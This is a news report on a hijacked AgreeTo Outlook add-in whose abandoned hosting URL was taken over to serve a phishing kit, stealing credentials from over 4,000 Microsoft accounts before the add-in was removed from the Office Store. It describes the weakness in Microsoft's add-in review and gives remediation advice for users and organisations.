A hijacked Outlook add-in stole credentials from more than 4,000 Microsoft accounts before being removed from the official Office Store today. Security researchers discovered the first malicious Outlook add-in operating in the wild, exploiting a blind spot in Microsoft's marketplace security.
The AgreeTo add-in originally launched as a legitimate meeting scheduling tool in December 2022. Developed by an independent publisher, it gained approval for Microsoft's Office Add-in Store but was later abandoned by its creator. The add-in remained listed on Microsoft's marketplace despite the developer moving on from the project.
Attackers claimed control of the abandoned hosting URL on Vercel's development platform. They replaced the legitimate scheduling tool with a four-page phishing kit that included a fake Microsoft sign-in page, password collection system, and exfiltration script. The malicious content loaded directly into Outlook's sidebar when users accessed the add-in.
Koi Security researchers accessed the attacker's exfiltration channel and confirmed over 4,000 compromised Microsoft accounts. The stolen data included email credentials, credit card numbers, and banking security answers. Attackers exfiltrated credentials via a Telegram Bot API, and the campaign remains active with new victims being compromised.
Attackers actively tested stolen credentials during the campaign, according to security firm analysis.
Microsoft's add-in architecture creates the vulnerability. Office add-ins load content from developer-hosted URLs rather than Microsoft's infrastructure. The company reviews and signs manifest files during initial approval but doesn't continuously verify hosted content after listing. This allowed the hijacked add-in to operate undetected until researchers discovered the compromise.
The malicious version displayed a convincing fake Microsoft login page within Outlook. After victims entered credentials, the add-in redirected them to the legitimate Microsoft login to reduce suspicion. The phishing kit remained available in the Microsoft Store until its removal on February 11, 2026.
The add-in retained ReadWriteItem permissions that could have allowed attackers to read and modify user emails, though no such activity was confirmed.
"This is the first malware found on Microsoft's official Marketplace and the first malicious Outlook add-in detected in the wild,"
said Koi Security researcher Oren Yomtov. The incident follows years of warnings about Outlook's add-in architecture representing an underexploited attack vector.
Users who installed AgreeTo should remove the add-in immediately. Affected individuals need to reset Microsoft account passwords, enable multi-factor authentication, and review recent account activity. The operator behind the campaign reportedly runs at least a dozen other phishing kits, suggesting broader credential harvesting infrastructure similar to recent phishing surges following major data breaches.
Microsoft had not issued a public statement about the incident at the time of reporting. The company removed the add-in from its marketplace following researcher disclosures. Security professionals recommend organizations audit all deployed Outlook add-ins and restrict user installation permissions to prevent similar attacks.
